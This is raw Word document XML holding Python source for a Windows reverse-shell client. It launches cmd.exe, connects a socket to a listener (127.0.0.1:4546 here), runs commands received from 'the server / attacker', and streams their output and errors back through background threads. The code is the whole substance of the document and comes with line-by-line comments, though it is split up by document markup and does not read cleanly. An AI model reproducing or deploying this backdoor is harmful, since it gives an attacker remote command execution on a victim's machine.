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3FBB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argparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6086E8F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</w:p>
    <w:p w14:paraId="32A4F5B9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</w:p>
    <w:p w14:paraId="7D737C71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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5279EAC5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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A305AD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</w:p>
    <w:p w14:paraId="1C18AFD6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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E6926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from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win32com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shell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import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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB4D0C9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62BAA421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#cmd.exe has now executed our command this client received from the server. Now we send the STDOUT result of that command after it ran via cmd.exe!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37829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Define a concurrency handler function dedicated to processing and sending standard shell output back to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4599DDAE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def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shellstdout_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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sender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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA3B9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612D18D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an infinite operational loop designed to continuously poll the running shell process for output data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E31FE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while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1370A0DD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</w:p>
    <w:p w14:paraId="62D7EB9D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Read available arbitrary data blocks from the standard output (</w:t>
      </w:r>
      <w:proofErr w:type="spell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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spell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) stream of the shell process without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1076E21F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output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gram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.stdout</w:t>
      </w:r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.read1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD6AF2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</w:p>
    <w:p w14:paraId="528C9BC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 try-except structure to gracefully handle runtime network drops or pipeline transit drops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774127A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try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199A8C35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5901879F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Transmit the captured standard output byte sequence directly through the established socket connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABCCBB6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.send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output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27DFBCA4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4D54A9E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#basic exception handler to kill the process for cmd.exe if we cannot reach the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44070A5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Intercept any network anomalies, exceptions, or connection drops happening during the send operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D238184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except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362C98B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67EB96AB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Display a localized debugging notification stating that the server connection link has failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5400176E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gramStart"/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print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"connection died..."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228FB3B9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7DEE9519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 Execute a forced </w:t>
      </w:r>
      <w:proofErr w:type="spell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taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spell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command sequence to completely terminate the active shell process and its child processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DAD891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Popen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"TASKKILL /F /PID </w:t>
      </w:r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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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}</w:t>
      </w:r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 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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format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.pid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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB30F84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6266F07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Safely close the active socket descriptor object to free up system networking resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22236025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lastRenderedPageBreak/>
        <w:t xml:space="preserve">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.close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422C224A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322C4939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Force an immediate, hard termination of the entire Python interpreter instance process via status code 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6801EF77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_exit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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4C8751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6BEFF52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</w:t>
      </w:r>
      <w:proofErr w:type="gram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send</w:t>
      </w:r>
      <w:proofErr w:type="gram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errors (example: you typed 'net </w:t>
      </w:r>
      <w:proofErr w:type="spell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usr</w:t>
      </w:r>
      <w:proofErr w:type="spell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' </w:t>
      </w:r>
      <w:proofErr w:type="spell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intead</w:t>
      </w:r>
      <w:proofErr w:type="spell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of 'net user'. This will show you the error produced by cmd.exe    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9CEB5A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Define a concurrency handler function dedicated to processing and sending standard error output back to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDC43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def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shellstderr_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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sender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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D812B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31312CF5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an infinite operational loop designed to continuously poll the running shell process for error logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469680C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while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16D740F7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</w:p>
    <w:p w14:paraId="5AE40212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Read available arbitrary data blocks from the standard error (stderr) stream of the shell process without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78304B2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output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gram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.stderr</w:t>
      </w:r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.read1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC0C0A1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</w:p>
    <w:p w14:paraId="50AAE53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 try-except structure to monitor network delivery operations and trap potential transit failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4727304A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try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4574562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1B1A1D1E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Transmit the captured error byte sequence directly through the established socket connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DBC08B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.send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output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30767AA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4C4B15B4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#basic exception handler to kill the process for cmd.exe if we cannot reach the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C8277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Intercept any network anomalies, exceptions, or connection drops happening during the send operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6475F48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except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1C32F56D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69FE1F47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Display a localized debugging notification stating that the server connection link has failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5502C7F9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gramStart"/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print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"connection died..."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66BE8BD9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3707EF5B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 Execute a forced </w:t>
      </w:r>
      <w:proofErr w:type="spell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taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spell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command sequence to completely terminate the active shell process and its child processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467642A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Popen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"TASKKILL /F /PID </w:t>
      </w:r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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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}</w:t>
      </w:r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 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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format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.pid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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E7331E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5DA0DFD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Safely close the active socket descriptor object to free up system networking resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB7073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.close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2B9C2B29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213092A5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lastRenderedPageBreak/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Force an immediate, hard termination of the entire Python interpreter instance process via status code 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F769A1B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_exit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6402F9AA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6130D24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#This function will take the command the server sent to this client, write it to the cmd.exe console, and execute it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FF369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#The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shellsender</w:t>
      </w:r>
      <w:proofErr w:type="spell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) function will send the results of the executed command back to the server / attacker        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD5DE6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Define a concurrency handler function dedicated to receiving inbound command strings from the listening server infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046818C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def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shellreceiver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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A2936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575BBD94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an infinite loop to keep the inbound socket listening interface running continuously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7584C31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while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013DFC0B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</w:p>
    <w:p w14:paraId="41FAD0A4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Implement a try-block to monitor network reception operations and trap potential channel failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E230895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try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310D1BBD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5EEDF2CE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Read an incoming data packet from the socket interface buffer up to a maximum size limit of 1024 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6988BE2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data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.recv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1024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3DF4890F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693ACD94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Evaluate if the received packet contains actual payload data by checking if its byte count is greater than zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED8B66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if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len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data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) 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&gt;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2709795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</w:p>
    <w:p w14:paraId="318185D4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</w:t>
      </w:r>
      <w:proofErr w:type="gram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if</w:t>
      </w:r>
      <w:proofErr w:type="gram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you </w:t>
      </w:r>
      <w:proofErr w:type="gram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type :leave</w:t>
      </w:r>
      <w:proofErr w:type="gram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: in the server/attacker console it closes the connection.  </w:t>
      </w:r>
      <w:proofErr w:type="gram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similar to</w:t>
      </w:r>
      <w:proofErr w:type="gram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'exit' but just a custom version of that that I like to implement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7F3D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Check if the decrypted plain-text string value contains the distinct termination token pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351CF6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if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gramStart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":leave</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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:"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in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data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.decode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"UTF-8"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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D7B0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</w:p>
    <w:p w14:paraId="42B59DA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 Execute a forced </w:t>
      </w:r>
      <w:proofErr w:type="spell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taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spell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command sequence to completely terminate the active shell process and its child processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6CD40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Popen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"TASKKILL /F /PID </w:t>
      </w:r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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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}</w:t>
      </w:r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 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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format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.pid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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060FB0C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</w:p>
    <w:p w14:paraId="22FE2CD2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Safely close the active socket descriptor object to free up system networking resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A3C4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.close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7FB7F87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</w:p>
    <w:p w14:paraId="4FC2CFCE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Force an immediate, hard termination of the entire Python interpreter instance process via status code 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAAFA0F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_exit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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4804B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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE8BBDD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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    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Feed the received command string directly into the standard input (stdin) channel of the running shell process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BE4A7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.stdin</w:t>
      </w:r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.write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data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78FFAC9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</w:p>
    <w:p w14:paraId="038BFE9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Force an immediate clear and flush of the input stream buffer to ensure immediate command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB36889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.stdin</w:t>
      </w:r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proofErr w:type="gramStart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flush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79BE1CA5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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5DCDB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#basic exception handler to kill the process for cmd.exe if we cannot reach the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A9D559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Intercept any network anomalies, exceptions, or connection drops happening during the receive operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A9871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</w:t>
      </w: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except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1C66EA1D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333023D1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Display a localized debugging notification stating that the server connection link has failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DAD52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gramStart"/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print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"connection died..."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5E2F2269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514804AA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 Execute a forced </w:t>
      </w:r>
      <w:proofErr w:type="spell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taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spell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command sequence to completely terminate the active shell process and its child processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7C486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Popen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"TASKKILL /F /PID </w:t>
      </w:r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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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8D358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NG"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r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 xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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format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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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myshellproc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.pid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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B2F8F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4B0C437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Safely close the active socket descriptor object to free up system networking resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085D147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.close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18BA537B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</w:p>
    <w:p w14:paraId="3F21627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Force an immediate, hard termination of the entire Python interpreter instance process via status code 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC0FDA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    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_exit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7589121B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2688960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# </w:t>
      </w:r>
      <w:proofErr w:type="gram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start</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve"> the command shell and pipe it's contents to stdin, stout, and stderr        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFC2D6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Instantiate an interactive command-line session process while establishing explicit piping links for input, output, and error channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69126C19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proofErr w:type="spellStart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Popen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"cmd.exe"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stdin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PIPE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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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PIPE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stderr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subprocess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PIPE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02C9EB8E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175E4C5A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Assign the network target destination loopback string addressing configuration for local host testing routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A3E12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host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"127.0.0.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05017874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2476A11B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Configure the specific TCP destination connection port identifier code for our outbound traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760F4DAA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port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4546</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423703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1E93BDFA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Initialize a streaming internet socket object leveraging standard IPv4 routing configurations and TCP mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBDFD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lastRenderedPageBreak/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spell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AF_INET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socket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SOCK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_STREAM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07F5E6B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7F9FA34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 try-block environment to attempt connection routines to the target listener without causing unhandled script crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A480DF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try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294BE272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5F3AE79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Attempt to initialize a standard network connection sequence targeting the predefined host IP address and numeric port details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D42E5A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connect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((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host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port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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7403150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354986D4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Intercept connection rejections, timeout exceptions, or routing failures that happen during socket alignment tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C64729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except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31A4C90F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19C2242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Print a distinct debugging notification detailing structural connection layer failures or missing server engines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F1047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proofErr w:type="gramStart"/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print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NG"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"server/socket must have died...time to hop off"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04453A7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6EE012D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Initiate a low-level process escape function to kill all running execution components instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25406DE5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os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_exit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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D35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0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33C4BA4A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1D2B8965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#This initiates our function threads!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A42995F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###############################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58029565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Instantiate a separate system thread worker mapped to continuously push standard command outputs via `</w:t>
      </w:r>
      <w:proofErr w:type="spell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shellstdout_sender</w:t>
      </w:r>
      <w:proofErr w:type="spell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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A3342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s2p_thread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threading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target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shellstdout_sender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args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD569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50EF18F2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Convert this specific worker thread into a background daemon so it terminates gracefully when the parent process stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9CEA0E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thread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daemon</w:t>
      </w:r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</w:p>
    <w:p w14:paraId="41CC1BBD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4E50F6DA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Boot up the newly configured background daemon thread to start pushing data to the socket channel concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131AF731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thread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start</w:t>
      </w:r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0C89DF2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2042B88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Instantiate another operational execution thread worker dedicated to pushing standard shell errors via `</w:t>
      </w:r>
      <w:proofErr w:type="spell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shellstderr_sender</w:t>
      </w:r>
      <w:proofErr w:type="spell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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AADF952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s2p_thread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threading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target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shellstderr_sender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args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42964E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788D0E2B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Convert this specific worker thread into a background daemon so it terminates gracefully when the parent process stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56656DAC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thread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daemon</w:t>
      </w:r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</w:p>
    <w:p w14:paraId="0C2D489D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40475C71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Boot up the newly configured background daemon thread to start pushing error data to the socket channel concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB237BE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lastRenderedPageBreak/>
        <w:t>s2p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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thread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start</w:t>
      </w:r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2C111B96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275C1FBD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Instantiate a third operational execution thread worker dedicated to listening for inbound server strings via `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shellreceiver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A4BC3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s2p_thread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threading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Thread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target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proofErr w:type="spellStart"/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shellreceiver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8D358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NG"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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client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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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myshellproc</w:t>
      </w:r>
      <w:proofErr w:type="spell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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7930DD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13544A88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Convert this specific worker thread into a background daemon so it terminates gracefully when the parent process stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BBF862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thread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daemon</w:t>
      </w:r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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=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</w:p>
    <w:p w14:paraId="7D348B2F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63CC8421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Boot up the newly configured background daemon thread to start checking the socket channel for tasks concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F5E225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s2p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D358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NG"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>thread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start</w:t>
      </w:r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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF17E74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###############################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418D2040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</w:p>
    <w:p w14:paraId="5E1B17AE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#continuous loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506865A5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Establish a permanent tracking block pointing out that the client loop requires an execution lock loop to preserve scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5010594F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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>while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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008D35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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>True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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F1AE5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</w:p>
    <w:p w14:paraId="75F78BF2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r w:rsidRPr="008D358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NG"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># Introduce a 1-second process execution pause inside the master loop thread execution cycle to prevent extreme CPU exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0AB11" w14:textId="77777777" w:rsidR="008D358D" w:rsidRPr="008D358D" w:rsidRDefault="008D358D" w:rsidP="008D35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</w:pP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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D35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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>time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.</w:t>
      </w:r>
      <w:r w:rsidRPr="008D358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NG"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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(</w:t>
      </w:r>
      <w:r w:rsidRPr="008D35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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008D35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NG"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789BD6F8" w14:textId="79634469" w:rsidR="008D358D" w:rsidRDefault="008D358D" w:rsidP="008D358D"/>
    <w:sectPr w:rsidR="008D35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8D"/>
    <w:rsid w:val="0067397D"/>
    <w:rsid w:val="008D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887C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CB94C566-D2E0-430D-9FD4-E89F6A4F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5B92FF22FAC44E950CF8BC9160185E" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="8e36f23ec5483a55d0ce9956695fd8c4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="f5b99105-96d1-4cfa-8dd4-2cf3826ced41" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="399c60db948775380308ccf789f53370" ns3:_="">
    <xsd:import namespace="f5b99105-96d1-4cfa-8dd4-2cf3826ced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99105-96d1-4cfa-8dd4-2cf3826ced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b99105-96d1-4cfa-8dd4-2cf3826ced41" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D7B6B2BC-BBB4-45E3-9116-285861D024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99105-96d1-4cfa-8dd4-2cf3826ced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7A2AAA-261D-4F2E-8A25-A1A69188BF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2E7219-5CF7-4416-B8C6-586DACEF01FA}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="f5b99105-96d1-4cfa-8dd4-2cf3826ced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1568</Words>
  <Characters>8938</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>74</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Macpherson Aghah</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Macpherson Aghah</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-01T16:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-01T16:13:00Z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2026-06-01T16:11:21Z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b6714e36-10aa-48c2-bb11-4664cc4624ad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0x0101007E5B92FF22FAC44E950CF8BC9160185E</vt:lpwstr>
  </property>
</Properties>
</file>